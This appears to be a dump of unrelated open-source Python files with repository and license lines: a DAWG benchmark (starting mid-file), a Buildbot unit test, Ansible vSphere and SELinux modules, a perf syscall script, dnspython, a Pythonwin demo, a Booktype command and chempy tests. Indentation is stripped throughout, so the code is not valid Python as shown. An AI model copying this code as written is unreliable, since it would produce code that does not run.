# ('values()', 'list(data.values())', ' ops/sec', 1, 1),
]
common_setup = """
from __main__ import create_dawg, create_bytes_dawg, create_record_dawg, create_int_dawg, create_leet_dawg
from __main__ import WORDS100k, NON_WORDS100k, MIXED_WORDS100k
from __main__ import PREFIXES_3_1k, PREFIXES_5_1k, PREFIXES_8_1k, PREFIXES_15_1k
from __main__ import LEET_50k, LEET_REPLACES
NON_WORDS_10k = NON_WORDS100k[:10000]
NON_WORDS_1k = ['ыва', 'xyz', 'соы', 'Axx', 'avы']*200
"""
dict_setup = common_setup + 'data = dict((word, len(word)) for word in WORDS100k);'
dawg_setup = common_setup + 'data = create_dawg(); repl = data.compile_replaces(LEET_REPLACES);'
bytes_dawg_setup = common_setup + 'data = create_bytes_dawg();'
record_dawg_setup = common_setup + 'data = create_record_dawg();'
int_dawg_setup = common_setup + 'data = create_int_dawg();'
leet_dawg_setup = common_setup + 'data = create_leet_dawg(); repl = data.compile_replaces(LEET_REPLACES);'
structures = [
('dict', dict_setup),
('DAWG', dawg_setup),
('BytesDAWG', bytes_dawg_setup),
('RecordDAWG', record_dawg_setup),
('IntDAWG', int_dawg_setup),
]
for test_name, test, descr, op_count, repeats in tests:
for name, setup in structures:
timer = timeit.Timer(test, setup)
full_test_name = "%s %s" % (name, test_name)
bench(full_test_name, timer, descr, op_count, repeats, 9)
# DAWG-specific benchmarks
# benchmark for similar_keys
bench(
"DAWG.similar_keys (no replaces)",
timeit.Timer(
"for word in WORDS100k[:50000]: data.similar_keys(word, repl)",
setup=dawg_setup,
),
op_count=0.05
)
bench(
"DAWG.similar_keys (l33t)",
timeit.Timer(
"for word in WORDS100k[:50000]: data.similar_keys(word, repl)",
setup=leet_dawg_setup,
),
op_count=0.05
)
for struct_name, setup in structures[1:]:
# prefixes of a given key
_bench_data = [
('hits', 'WORDS100k'),
('mixed', 'MIXED_WORDS100k'),
('misses', 'NON_WORDS100k'),
]
for meth in ['prefixes']:
for name, data in _bench_data:
bench(
'%s.%s (%s)' % (struct_name, meth, name),
timeit.Timer(
"for word in %s:\n"
" data.%s(word)" % (data, meth),
setup
),
runs=3,
)
for meth in ['iterprefixes']:
for name, data in _bench_data:
bench(
'%s.%s (%s)' % (struct_name, meth, name),
timeit.Timer(
"for word in %s:\n"
" list(data.%s(word))" % (data, meth),
setup
),
runs=3,
)
# keys with a given prefix
_bench_data = [
('xxx', 'avg_len(res)==415', 'PREFIXES_3_1k'),
('xxxxx', 'avg_len(res)==17', 'PREFIXES_5_1k'),
('xxxxxxxx', 'avg_len(res)==3', 'PREFIXES_8_1k'),
('xxxxx..xx', 'avg_len(res)==1.4', 'PREFIXES_15_1k'),
('xxx', 'NON_EXISTING', 'NON_WORDS_1k'),
]
for xxx, avg, data in _bench_data:
for meth in ['keys', 'items']:
bench(
'%s.%s(prefix="%s"), %s' % (struct_name, meth, xxx, avg),
timeit.Timer(
"for word in %s: data.%s(word)" % (data, meth),
setup
),
'K ops/sec',
op_count=1,
runs=3,
text_width=60,
)
for meth in ['iterkeys', 'iteritems']:
bench(
'%s.%s(prefix="%s"), %s' % (struct_name, meth, xxx, avg),
timeit.Timer(
"for word in %s: list(data.%s(word))" % (data, meth),
setup
),
'K ops/sec',
op_count=1,
runs=3,
text_width=60,
)
def check_dawg(trie, words):
value = 0
for word in words:
value += trie[word]
if value != len(words):
raise Exception()
def profiling():
import pstats
import cProfile
print('\n====== Profiling =======\n')
d = create_bytes_dawg()
WORDS = words100k()
def check_getitem(trie, words):
for word in words:
trie[word]
cProfile.runctx("check_getitem(d, WORDS)", globals(), locals(), "Profile.prof")
# def check_prefixes(trie, words):
# for word in words:
# trie.keys(word)
# cProfile.runctx("check_prefixes(d, NON_WORDS_1k)", globals(), locals(), "Profile.prof")
#
#cProfile.runctx("check_trie(d, WORDS)", globals(), locals(), "Profile.prof")
s = pstats.Stats("Profile.prof")
s.strip_dirs().sort_stats("time").print_stats(20)
if __name__ == '__main__':
benchmark()
#profiling()
print('\n~~~~~~~~~~~~~~\n') | mit |
tardyp/buildbot | master/buildbot/test/unit/test_pbmanager.py | 5 | 6372 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
"""
Test clean shutdown functionality of the master
"""
import mock
from twisted.cred import credentials
from twisted.internet import defer
from twisted.spread import pb
from twisted.trial import unittest
from buildbot import pbmanager
class FakeMaster:
initLock = defer.DeferredLock()
def addService(self, svc):
pass
@property
def master(self):
return self
class TestPBManager(unittest.TestCase):
@defer.inlineCallbacks
def setUp(self):
self.pbm = pbmanager.PBManager()
yield self.pbm.setServiceParent(FakeMaster())
self.pbm.startService()
self.connections = []
def tearDown(self):
return self.pbm.stopService()
def perspectiveFactory(self, mind, username):
persp = mock.Mock()
persp.is_my_persp = True
persp.attached = lambda mind: defer.succeed(None)
self.connections.append(username)
return defer.succeed(persp)
@defer.inlineCallbacks
def test_repr(self):
reg = yield self.pbm.register(
'tcp:0:interface=127.0.0.1', "x", "y", self.perspectiveFactory)
self.assertEqual(repr(self.pbm.dispatchers['tcp:0:interface=127.0.0.1']),
'<pbmanager.Dispatcher for x on tcp:0:interface=127.0.0.1>')
self.assertEqual(
repr(reg), '<pbmanager.Registration for x on tcp:0:interface=127.0.0.1>')
@defer.inlineCallbacks
def test_register_unregister(self):
portstr = "tcp:0:interface=127.0.0.1"
reg = yield self.pbm.register(portstr, "boris", "pass", self.perspectiveFactory)
# make sure things look right
self.assertIn(portstr, self.pbm.dispatchers)
disp = self.pbm.dispatchers[portstr]
self.assertIn('boris', disp.users)
# we can't actually connect to it, as that requires finding the
# dynamically allocated port number which is buried out of reach;
# however, we can try the requestAvatar and requestAvatarId methods.
username = yield disp.requestAvatarId(credentials.UsernamePassword(b'boris', b'pass'))
self.assertEqual(username, b'boris')
avatar = yield disp.requestAvatar(b'boris', mock.Mock(), pb.IPerspective)
(iface, persp, detach_fn) = avatar
self.assertTrue(persp.is_my_persp)
self.assertIn('boris', self.connections)
yield reg.unregister()
@defer.inlineCallbacks
def test_register_no_user(self):
portstr = "tcp:0:interface=127.0.0.1"
reg = yield self.pbm.register(portstr, "boris", "pass", self.perspectiveFactory)
# make sure things look right
self.assertIn(portstr, self.pbm.dispatchers)
disp = self.pbm.dispatchers[portstr]
self.assertIn('boris', disp.users)
# we can't actually connect to it, as that requires finding the
# dynamically allocated port number which is buried out of reach;
# however, we can try the requestAvatar and requestAvatarId methods.
username = yield disp.requestAvatarId(credentials.UsernamePassword(b'boris', b'pass'))
self.assertEqual(username, b'boris')
with self.assertRaises(ValueError):
yield disp.requestAvatar(b'notboris', mock.Mock(), pb.IPerspective)
self.assertNotIn('boris', self.connections)
yield reg.unregister()
@defer.inlineCallbacks
def test_double_register_unregister(self):
portstr = "tcp:0:interface=127.0.0.1"
reg1 = yield self.pbm.register(portstr, "boris", "pass", None)
reg2 = yield self.pbm.register(portstr, "ivona", "pass", None)
# make sure things look right
self.assertEqual(len(self.pbm.dispatchers), 1)
self.assertIn(portstr, self.pbm.dispatchers)
disp = self.pbm.dispatchers[portstr]
self.assertIn('boris', disp.users)
self.assertIn('ivona', disp.users)
yield reg1.unregister()
self.assertEqual(len(self.pbm.dispatchers), 1)
self.assertIn(portstr, self.pbm.dispatchers)
disp = self.pbm.dispatchers[portstr]
self.assertNotIn('boris', disp.users)
self.assertIn('ivona', disp.users)
yield reg2.unregister()
self.assertEqual(len(self.pbm.dispatchers), 0)
@defer.inlineCallbacks
def test_requestAvatarId_noinitLock(self):
portstr = "tcp:0:interface=127.0.0.1"
reg = yield self.pbm.register(portstr, "boris", "pass", self.perspectiveFactory)
disp = self.pbm.dispatchers[portstr]
d = disp.requestAvatarId(credentials.UsernamePassword(b'boris', b'pass'))
self.assertTrue(d.called,
"requestAvatarId should have been called since the lock is free")
yield reg.unregister()
@defer.inlineCallbacks
def test_requestAvatarId_initLock(self):
portstr = "tcp:0:interface=127.0.0.1"
reg = yield self.pbm.register(portstr, "boris", "pass", self.perspectiveFactory)
disp = self.pbm.dispatchers[portstr]
try:
# simulate a reconfig/restart in progress
yield self.pbm.master.initLock.acquire()
# try to authenticate while the lock is locked
d = disp.requestAvatarId(credentials.UsernamePassword(b'boris', b'pass'))
self.assertFalse(d.called,
"requestAvatarId should block until the lock is released")
finally:
# release the lock, it should allow for auth to proceed
yield self.pbm.master.initLock.release()
self.assertTrue(d.called,
"requestAvatarId should have been called after the lock was released")
yield reg.unregister()
| gpl-2.0 |
erwilan/ansible | lib/ansible/modules/cloud/vmware/vsphere_copy.py | 34 | 6561 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2015 Dag Wieers <dag@wieers.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: vsphere_copy
short_description: Copy a file to a vCenter datastore
description:
- Upload files to a vCenter datastore
version_added: 2.0
author: Dag Wieers (@dagwieers) <dag@wieers.com>
options:
host:
description:
- The vCenter server on which the datastore is available.
required: true
login:
description:
- The login name to authenticate on the vCenter server.
required: true
password:
description:
- The password to authenticate on the vCenter server.
required: true
src:
description:
- The file to push to vCenter
required: true
datacenter:
description:
- The datacenter on the vCenter server that holds the datastore.
required: true
datastore:
description:
- The datastore on the vCenter server to push files to.
required: true
path:
description:
- The file to push to the datastore on the vCenter server.
required: true
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be
set to C(no) when no other option exists.
required: false
default: 'yes'
choices: ['yes', 'no']
notes:
- "This module ought to be run from a system that can access vCenter directly and has the file to transfer.
It can be the normal remote target or you can change it either by using C(transport: local) or using C(delegate_to)."
- Tested on vSphere 5.5
'''
EXAMPLES = '''
- vsphere_copy:
host: vhost
login: vuser
password: vpass
src: /some/local/file
datacenter: DC1 Someplace
datastore: datastore1
path: some/remote/file
transport: local
- vsphere_copy:
host: vhost
login: vuser
password: vpass
src: /other/local/file
datacenter: DC2 Someplace
datastore: datastore2
path: other/remote/file
delegate_to: other_system
'''
import atexit
import mmap
import errno
import socket
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.pycompat24 import get_exception
from ansible.module_utils.six.moves.urllib.parse import urlencode
from ansible.module_utils.urls import open_url
def vmware_path(datastore, datacenter, path):
''' Constructs a URL path that VSphere accepts reliably '''
path = "/folder/%s" % path.lstrip("/")
# Due to a software bug in vSphere, it fails to handle ampersand in datacenter names
# The solution is to do what vSphere does (when browsing) and double-encode ampersands, maybe others ?
datacenter = datacenter.replace('&', '%26')
if not path.startswith("/"):
path = "/" + path
params = dict( dsName = datastore )
if datacenter:
params["dcPath"] = datacenter
params = urlencode(params)
return "%s?%s" % (path, params)
def main():
module = AnsibleModule(
argument_spec = dict(
host = dict(required=True, aliases=[ 'hostname' ]),
login = dict(required=True, aliases=[ 'username' ]),
password = dict(required=True, no_log=True),
src = dict(required=True, aliases=[ 'name' ]),
datacenter = dict(required=True),
datastore = dict(required=True),
dest = dict(required=True, aliases=[ 'path' ]),
validate_certs = dict(required=False, default=True, type='bool'),
),
# Implementing check-mode using HEAD is impossible, since size/date is not 100% reliable
supports_check_mode = False,
)
host = module.params.get('host')
login = module.params.get('login')
password = module.params.get('password')
src = module.params.get('src')
datacenter = module.params.get('datacenter')
datastore = module.params.get('datastore')
dest = module.params.get('dest')
validate_certs = module.params.get('validate_certs')
fd = open(src, "rb")
atexit.register(fd.close)
data = mmap.mmap(fd.fileno(), 0, access=mmap.ACCESS_READ)
atexit.register(data.close)
remote_path = vmware_path(datastore, datacenter, dest)
url = 'https://%s%s' % (host, remote_path)
headers = {
"Content-Type": "application/octet-stream",
"Content-Length": str(len(data)),
}
try:
r = open_url(url, data=data, headers=headers, method='PUT',
url_username=login, url_password=password, validate_certs=validate_certs,
force_basic_auth=True)
except socket.error:
e = get_exception()
if isinstance(e.args, tuple) and e[0] == errno.ECONNRESET:
# VSphere resets connection if the file is in use and cannot be replaced
module.fail_json(msg='Failed to upload, image probably in use', status=None, errno=e[0], reason=str(e), url=url)
else:
module.fail_json(msg=str(e), status=None, errno=e[0], reason=str(e), url=url)
except Exception:
e = get_exception()
error_code = -1
try:
if isinstance(e[0], int):
error_code = e[0]
except KeyError:
pass
module.fail_json(msg=str(e), status=None, errno=error_code, reason=str(e), url=url)
status = r.getcode()
if 200 <= status < 300:
module.exit_json(changed=True, status=status, reason=r.msg, url=url)
else:
length = r.headers.get('content-length', None)
if r.headers.get('transfer-encoding', '').lower() == 'chunked':
chunked = 1
else:
chunked = 0
module.fail_json(msg='Failed to upload', errno=None, status=status, reason=r.msg, length=length, headers=dict(r.headers), chunked=chunked, url=url)
if __name__ == '__main__':
main()
| gpl-3.0 |
j1nx/Amlogic-reff16-kernel | tools/perf/scripts/python/failed-syscalls-by-pid.py | 944 | 1869 | # failed system call counts, by pid
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide failed system call totals, broken down by pid.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
usage = "perf trace -s syscall-counts-by-pid.py [comm]\n";
for_comm = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
pass
def trace_end():
print_error_totals()
def raw_syscalls__sys_exit(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, ret):
if for_comm is not None:
if common_comm != for_comm:
return
if ret < 0:
try:
syscalls[common_comm][common_pid][id][ret] += 1
except TypeError:
syscalls[common_comm][common_pid][id][ret] = 1
def print_error_totals():
if for_comm is not None:
print "\nsyscall errors for %s:\n\n" % (for_comm),
else:
print "\nsyscall errors:\n\n",
print "%-30s %10s\n" % ("comm [pid]", "count"),
print "%-30s %10s\n" % ("------------------------------", \
"----------"),
comm_keys = syscalls.keys()
for comm in comm_keys:
pid_keys = syscalls[comm].keys()
for pid in pid_keys:
print "\n%s [%d]\n" % (comm, pid),
id_keys = syscalls[comm][pid].keys()
for id in id_keys:
print " syscall: %-16d\n" % (id),
ret_keys = syscalls[comm][pid][id].keys()
for ret, val in sorted(syscalls[comm][pid][id].iteritems(), key = lambda(k, v): (v, k), reverse = True):
print " err = %-20d %10d\n" % (ret, val),
| gpl-2.0 |
ptemplier/ansible | lib/ansible/modules/system/selinux.py | 14 | 6747 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Derek Carter<goozbach@friocorte.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
module: selinux
short_description: Change policy and state of SELinux
description:
- Configures the SELinux mode and policy. A reboot may be required after usage. Ansible will not issue this reboot but will let you know when it is required.
version_added: "0.7"
options:
policy:
description:
- "name of the SELinux policy to use (example: C(targeted)) will be required if state is not C(disabled)"
required: false
default: null
state:
description:
- The SELinux mode
required: true
default: null
choices: [ "enforcing", "permissive", "disabled" ]
conf:
description:
- path to the SELinux configuration file, if non-standard
required: false
default: "/etc/selinux/config"
notes:
- Not tested on any debian based system
requirements: [ libselinux-python ]
author: "Derek Carter (@goozbach) <goozbach@friocorte.com>"
'''
EXAMPLES = '''
# Enable SELinux
- selinux:
policy: targeted
state: enforcing
# Put SELinux in permissive mode, logging actions that would be blocked.
- selinux:
policy: targeted
state: permissive
# Disable SELinux
- selinux:
state: disabled
'''
import os
import re
try:
import selinux
HAS_SELINUX = True
except ImportError:
HAS_SELINUX = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.facts.utils import get_file_lines
# getter subroutines
def get_config_state(configfile):
lines = get_file_lines(configfile)
for line in lines:
stateline = re.match(r'^SELINUX=.*$', line)
if stateline:
return line.split('=')[1].strip()
def get_config_policy(configfile):
lines = get_file_lines(configfile)
for line in lines:
stateline = re.match(r'^SELINUXTYPE=.*$', line)
if stateline:
return line.split('=')[1].strip()
# setter subroutines
def set_config_state(state, configfile):
# SELINUX=permissive
# edit config file with state value
stateline = 'SELINUX=%s' % state
lines = get_file_lines(configfile)
with open(configfile, "w") as write_file:
for line in lines:
write_file.write(re.sub(r'^SELINUX=.*', stateline, line))
def set_state(module, state):
if state == 'enforcing':
selinux.security_setenforce(1)
elif state == 'permissive':
selinux.security_setenforce(0)
elif state == 'disabled':
pass
else:
msg = 'trying to set invalid runtime state %s' % state
module.fail_json(msg=msg)
def set_config_policy(policy, configfile):
# edit config file with state value
# SELINUXTYPE=targeted
policyline = 'SELINUXTYPE=%s' % policy
lines = get_file_lines(configfile)
with open(configfile, "w") as write_file:
for line in lines:
write_file.write(re.sub(r'^SELINUXTYPE=.*', policyline, line))
def main():
module = AnsibleModule(
argument_spec=dict(
policy=dict(required=False),
state=dict(choices=['enforcing', 'permissive', 'disabled'], required=True),
configfile=dict(aliases=['conf', 'file'], default='/etc/selinux/config')
),
supports_check_mode=True
)
if not HAS_SELINUX:
module.fail_json(msg='libselinux-python required for this module')
# global vars
changed = False
msgs = []
configfile = module.params['configfile']
policy = module.params['policy']
state = module.params['state']
runtime_enabled = selinux.is_selinux_enabled()
runtime_policy = selinux.selinux_getpolicytype()[1]
runtime_state = 'disabled'
if runtime_enabled:
# enabled means 'enforcing' or 'permissive'
if selinux.security_getenforce():
runtime_state = 'enforcing'
else:
runtime_state = 'permissive'
if not os.path.isfile(configfile):
module.fail_json(msg="Unable to find file {0}".format(configfile),
details="Please install SELinux-policy package, "
"if this package is not installed previously.")
config_policy = get_config_policy(configfile)
config_state = get_config_state(configfile)
# check to see if policy is set if state is not 'disabled'
if state != 'disabled':
if not policy:
module.fail_json(msg='policy is required if state is not \'disabled\'')
else:
if not policy:
policy = config_policy
# check changed values and run changes
if policy != runtime_policy:
if module.check_mode:
module.exit_json(changed=True)
# cannot change runtime policy
msgs.append('reboot to change the loaded policy')
changed = True
if policy != config_policy:
if module.check_mode:
module.exit_json(changed=True)
msgs.append('config policy changed from \'%s\' to \'%s\'' % (config_policy, policy))
set_config_policy(policy, configfile)
changed = True
if state != runtime_state:
if module.check_mode:
module.exit_json(changed=True)
if runtime_enabled:
if state == 'disabled':
if runtime_state != 'permissive':
# Temporarily set state to permissive
set_state(module, 'permissive')
msgs.append('runtime state temporarily changed from \'%s\' to \'permissive\', state change will take effect next reboot' % (runtime_state))
else:
msgs.append('state change will take effect next reboot')
else:
set_state(module, state)
msgs.append('runtime state changed from \'%s\' to \'%s\'' % (runtime_state, state))
else:
msgs.append('state change will take effect next reboot')
changed = True
if state != config_state:
if module.check_mode:
module.exit_json(changed=True)
msgs.append('config state changed from \'%s\' to \'%s\'' % (config_state, state))
set_config_state(state, configfile)
changed = True
module.exit_json(changed=changed, msg=', '.join(msgs), configfile=configfile, policy=policy, state=state)
#################################################
if __name__ == '__main__':
main()
| gpl-3.0 |
renanrodm/namebench | nb_third_party/dns/rdtypes/IN/APL.py | 248 | 5525 | # Copyright (C) 2003-2007, 2009, 2010 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import cStringIO
import struct
import dns.exception
import dns.inet
import dns.rdata
import dns.tokenizer
class APLItem(object):
"""An APL list item.
@ivar family: the address family (IANA address family registry)
@type family: int
@ivar negation: is this item negated?
@type negation: bool
@ivar address: the address
@type address: string
@ivar prefix: the prefix length
@type prefix: int
"""
__slots__ = ['family', 'negation', 'address', 'prefix']
def __init__(self, family, negation, address, prefix):
self.family = family
self.negation = negation
self.address = address
self.prefix = prefix
def __str__(self):
if self.negation:
return "!%d:%s/%s" % (self.family, self.address, self.prefix)
else:
return "%d:%s/%s" % (self.family, self.address, self.prefix)
def to_wire(self, file):
if self.family == 1:
address = dns.inet.inet_pton(dns.inet.AF_INET, self.address)
elif self.family == 2:
address = dns.inet.inet_pton(dns.inet.AF_INET6, self.address)
else:
address = self.address.decode('hex_codec')
#
# Truncate least significant zero bytes.
#
last = 0
for i in xrange(len(address) - 1, -1, -1):
if address[i] != chr(0):
last = i + 1
break
address = address[0 : last]
l = len(address)
assert l < 128
if self.negation:
l |= 0x80
header = struct.pack('!HBB', self.family, self.prefix, l)
file.write(header)
file.write(address)
class APL(dns.rdata.Rdata):
"""APL record.
@ivar items: a list of APL items
@type items: list of APL_Item
@see: RFC 3123"""
__slots__ = ['items']
def __init__(self, rdclass, rdtype, items):
super(APL, self).__init__(rdclass, rdtype)
self.items = items
def to_text(self, origin=None, relativize=True, **kw):
return ' '.join(map(lambda x: str(x), self.items))
def from_text(cls, rdclass, rdtype, tok, origin = None, relativize = True):
items = []
while 1:
token = tok.get().unescape()
if token.is_eol_or_eof():
break
item = token.value
if item[0] == '!':
negation = True
item = item[1:]
else:
negation = False
(family, rest) = item.split(':', 1)
family = int(family)
(address, prefix) = rest.split('/', 1)
prefix = int(prefix)
item = APLItem(family, negation, address, prefix)
items.append(item)
return cls(rdclass, rdtype, items)
from_text = classmethod(from_text)
def to_wire(self, file, compress = None, origin = None):
for item in self.items:
item.to_wire(file)
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin = None):
items = []
while 1:
if rdlen < 4:
raise dns.exception.FormError
header = struct.unpack('!HBB', wire[current : current + 4])
afdlen = header[2]
if afdlen > 127:
negation = True
afdlen -= 128
else:
negation = False
current += 4
rdlen -= 4
if rdlen < afdlen:
raise dns.exception.FormError
address = wire[current : current + afdlen]
l = len(address)
if header[0] == 1:
if l < 4:
address += '\x00' * (4 - l)
address = dns.inet.inet_ntop(dns.inet.AF_INET, address)
elif header[0] == 2:
if l < 16:
address += '\x00' * (16 - l)
address = dns.inet.inet_ntop(dns.inet.AF_INET6, address)
else:
#
# This isn't really right according to the RFC, but it
# seems better than throwing an exception
#
address = address.encode('hex_codec')
current += afdlen
rdlen -= afdlen
item = APLItem(header[0], negation, address, header[1])
items.append(item)
if rdlen == 0:
break
return cls(rdclass, rdtype, items)
from_wire = classmethod(from_wire)
def _cmp(self, other):
f = cStringIO.StringIO()
self.to_wire(f)
wire1 = f.getvalue()
f.seek(0)
f.truncate()
other.to_wire(f)
wire2 = f.getvalue()
f.close()
return cmp(wire1, wire2)
| apache-2.0 |
windyuuy/opera | chromium/src/third_party/python_26/Lib/site-packages/pythonwin/pywin/Demos/cmdserver.py | 34 | 2629 | # cmdserver.py
# Demo code that is not Pythonwin related, but too good to throw away...
import win32api
import sys
from pywin.framework import winout
import thread, sys
import traceback
class ThreadWriter:
"Assign an instance to sys.stdout for per-thread printing objects - Courtesy Guido!"
def __init__(self):
"Constructor -- initialize the table of writers"
self.writers = {}
self.origStdOut = None
def register(self, writer):
"Register the writer for the current thread"
self.writers[thread.get_ident()] = writer
if self.origStdOut is None:
self.origStdOut = sys.stdout
sys.stdout = self
def unregister(self):
"Remove the writer for the current thread, if any"
try:
del self.writers[thread.get_ident()]
except KeyError:
pass
if len(self.writers)==0:
sys.stdout = self.origStdOut
self.origStdOut = None
def getwriter(self):
"Return the current thread's writer, default sys.stdout"
try:
return self.writers[thread.get_ident()]
except KeyError:
return self.origStdOut
def write(self, str):
"Write to the current thread's writer, default sys.stdout"
self.getwriter().write(str)
def Test():
num=1
while num<1000:
print 'Hello there no ' + str(num)
win32api.Sleep(50)
num = num + 1
class flags:
SERVER_BEST = 0
SERVER_IMMEDIATE = 1
SERVER_THREAD = 2
SERVER_PROCESS = 3
def StartServer( cmd, title=None, bCloseOnEnd=0, serverFlags = flags.SERVER_BEST ):
out = winout.WindowOutput( title, None, winout.flags.WQ_IDLE )
if not title:
title=cmd
out.Create(title)
# ServerThread((out, cmd, title, bCloseOnEnd))
# out = sys.stdout
thread.start_new_thread( ServerThread, (out, cmd, title, bCloseOnEnd) )
def ServerThread(myout, cmd, title, bCloseOnEnd):
try:
writer.register(myout)
print 'Executing "%s"\n' % cmd
bOK = 1
try:
import __main__
exec (cmd+'\n', __main__.__dict__)
except:
bOK = 0
if bOK:
print "Command terminated without errors."
else:
t, v, tb = sys.exc_info()
print t, ': ', v
traceback.print_tb(tb)
tb = None # prevent a cycle
print "Command terminated with an unhandled exception"
writer.unregister()
if bOK and bCloseOnEnd:
myout.frame.DestroyWindow()
# Unhandled exception of any kind in a thread kills the gui!
except:
t, v, tb = sys.exc_info()
print t, ': ', v
traceback.print_tb(tb)
tb = None
print "Thread failed"
# assist for reloading (when debugging) - use only 1 tracer object,
# else a large chain of tracer objects will exist.
#try:
# writer
#except NameError:
# writer=ThreadWriter()
if __name__=='__main__':
import demoutils
demoutils.NotAScript()
| bsd-3-clause |
latinproject/booktype-latin | lib/booki/editor/management/commands/confset.py | 2 | 4113 | # This file is part of Booktype.
# Copyright (c) 2012 Aleksandar Erkalovic <aleksandar.erkalovic@sourcefabric.org>
#
# Booktype is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Booktype is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Booktype. If not, see <http://www.gnu.org/licenses/>.
from django.core.management.base import BaseCommand, CommandError
from optparse import make_option
from django.conf import settings
from booki.utils import config
from booki.utils.json_wrapper import json
class Command(BaseCommand):
args = "<name> <value>"
help = "Set value for configuration variable."
option_list = BaseCommand.option_list + (
make_option('--as_json',
action='store_true',
dest='as_json',
default=False,
help='Value is defined as JSON encoded string.'),
make_option('--integer',
action='store_true',
dest='integer',
default=False,
help='Value is a integer.'),
make_option('--float',
action='store_true',
dest='float',
default=False,
help='Value is a float.'),
make_option('--append',
action='store_true',
dest='append',
default=False,
help='Append value to the end of list.'),
make_option('--remove',
action='store_true',
dest='remove',
default=False,
help='Remove value from the list.'),
)
requires_model_validation = False
def handle(self, *args, **options):
if not hasattr(settings, 'BOOKTYPE_CONFIG'):
raise CommandError('Does not have BOOKTYPE_CONFIG in settings.py file.')
if len(args) != 2:
raise CommandError("You must specify variable name and value.")
key = args[0]
value = args[1]
if options['integer']:
try:
value = int(value)
except ValueError:
raise CommandError("I don't think this %s is a number!" % value)
if options['float']:
try:
value = float(value)
except ValueError:
raise CommandError("I don't think this %s is a number!" % value)
if options['as_json']:
try:
value = json.loads(value)
except ValueError:
raise CommandError("Not a valid JSON string.")
if options['append']:
# ovo neshto ne radi sa as_jsonom
lst = config.getConfiguration(key, [])
if type(lst) == type([]):
lst.append(value)
config.setConfiguration(key, lst)
else:
raise CommandError("Can not append to something that is not a list")
elif options['remove']:
lst = config.getConfiguration(key, [])
if type(lst) == type([]):
try:
lst.remove(value)
except ValueError:
raise CommandError("I can't see it!")
config.setConfiguration(key, lst)
else:
raise CommandError("Can not append to something that is not a list")
else:
config.setConfiguration(key, value)
try:
config.saveConfiguration()
except config.ConfigurationError:
raise CommandError("Could not save the file.")
| agpl-3.0 |
bjodah/aqchem | chempy/thermodynamics/tests/test_expressions.py | 1 | 3227 | # -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
import math
from chempy.chemistry import Equilibrium
from chempy.util._expr import Expr
from chempy.util.testing import requires
from chempy.units import allclose, units_library, Backend, default_units as du, default_constants as dc
from ..expressions import MassActionEq, GibbsEqConst
@requires('sympy')
def test_MassActionEq_symbolic():
import sympy as sp
K, A, B, C = sp.symbols('K A B C')
mae = MassActionEq([K])
eq = Equilibrium({'A'}, {'B', 'C'})
expr = mae.equilibrium_equation({'A': A, 'B': B, 'C': C}, equilibrium=eq)
assert expr - K + B*C/A == 0
def test_GibbsEqConst():
R, T = 8.314, 298.15
dH, dS = -4e3, 16
gee = GibbsEqConst([dH/R, dS/R])
ref = math.exp(-(dH - T*dS)/(R*T))
assert abs((gee({'temperature': T}) - ref)/ref) < 1e-14
